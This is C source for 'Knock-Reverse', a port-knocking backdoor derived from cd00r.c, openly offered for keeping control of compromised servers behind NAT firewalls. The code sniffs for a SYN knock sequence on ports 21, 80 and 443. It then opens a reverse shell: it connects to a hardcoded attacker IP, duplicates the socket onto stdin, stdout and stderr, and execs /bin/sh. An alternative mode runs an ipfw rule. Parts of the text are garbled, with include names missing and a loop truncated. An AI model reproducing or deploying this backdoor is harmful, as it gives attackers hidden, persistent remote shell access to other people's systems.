/* Knock-Reverse backdoor is a backdoor based on cd00r.c phenolite.de - cd00r is a backdoor which uses knocking port technique combined with inetd backdoor - Knock-Reverse combines knocking port technique ,which used by cd00r, with reverse connect backdoor. - Knock-Reverse is very usefull on backdooring server inside of NAT with restricted inbound firewall in gateway [attacker] ------------- [gateway+firewall] ------------- [Server owned inside NAT] For illustration : Inbound firewall in gateway only allows connection to port 20,21,80,443. Backdooring using a binding method needs to compromise gateway servers or modification of running service on port 21,80,443 which will be difficult. We can used opened port to make a reverse connect to attacker server by sending TCP SYN flags. This code has been tested on Linux, OpenBSD, FreeBSD x86. Hiding this daemon is your jobz :P Copyright Ph03n1X of kandangjamur.net /et/ 2007 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define INTERFACE "eth0" #define KNOCKRULE {21,80,443} #define CIP "172.16.11.234" #define PORTCB 54321 //Kasus di set satu jika sigunakan untuk keperluan connect - back //Kasus di set dua jika digunakan untuk keperluan mengubah rule firewall #define FWRULE "ipfw add 50 fw 127.0.0.1,22 tcp from any to any 443 in" #define KASUS 1 #define ETHLENGTH 14 #define IP_MIN_LENGTH 20 #define CAPLENGTH 98 struct headerip { u_char ihl:4, /* header length */ version:4; /* version */ u_char tos; /* type of service */ short tot_len; /* total length */ u_short id; /* identification */ short off; /* fragment offset field */ u_char ttl; /* time to live */ u_char protocol; /* protocol */ u_short check; /* checksum */ struct in_addr saddr; struct in_addr daddr; /* source and dest address */ }; struct headertcp { unsigned short int src_port; unsigned short int dest_port; unsigned long int seq_num; unsigned long int ack_num; unsigned short int rawflags; unsigned short int window; long int crc_a_urgent; long int options_a_padding; }; unsigned int cports[] = KNOCKRULE; int cportcnt = 0; int actport = 0; void signal_handler(int sig) { _exit(0); } void *smalloc(size_t size) { void *p; if ((p=malloc(size))==NULL) { exit(-1); } memset(p,0,size); return p; } void conback() { int s,con,child; struct hostent *he; struct sockaddr_in address; if((s=socket(AF_INET,SOCK_STREAM,0))<0){ printf("Gagal bikin socket untuk reverse connect\n"); } if((he=gethostbyname(CIP))==NULL){ printf("Gagal resolve IP buat reverse\n"); close(s); } bzero((char *) &address, sizeof(address)); address.sin_family = AF_INET; bcopy( (char *)he->h_addr,(char *)&address.sin_addr.s_addr,he->h_length); address.sin_port = htons(PORTCB); child=fork(); if(child==0){ con=connect(s,(struct sockaddr *)&address,sizeof(address)); if(con<0){ printf("Ga bisa connect ke box yang ada netcat listennya\n"); close(s); } dup2(s,2); dup2(s,1); dup2(s,0); printf("Remote reverse backdoor by Ph03n1X || king_purba@yahoo.co.uk\n"); system("uname -a;id"); execl("/bin/sh","/bin/sh -i",NULL); close(s); } close(s); } int main(int argc,char *argv[]) { char pcap_err[PCAP_ERRBUF_SIZE]; pcap_t *cap; bpf_u_int32 network,netmask; struct pcap_pkthdr *phead; struct bpf_program cfilter; struct headerip *ip; struct headertcp *tcp; u_char *pdata; char *filter; char portnum[6]; int i; #define PORTCON "port " #define ORCON " or " while (cports[cportcnt++]); cportcnt--; if (cports[0]) { memset(&portnum,0,6); snprintf(portnum,sizeof(portnum)," %d",cports[0]); filter=(char *)smalloc(strlen(PORTCON)+strlen(portnum)+1); strncpy(filter,PORTCON,sizeof(filter)); strncat(filter,portnum,sizeof(filter)); } else { printf("NO port code\n"); exit (0); } for (i=1;iihl*4)); if((ntohs(tcp->rawflags)&0x02)){ printf("This is SYN packet\n"); if (ntohs(tcp->dest_port)==cports[actport]) { if ((++actport)==cportcnt) { if(KASUS==1){ conback(); actport=0; }else if(KASUS==2){ system(FWRULE); actport=0; }else{ actport=0; continue; } } } } } }//end of never ending for loop }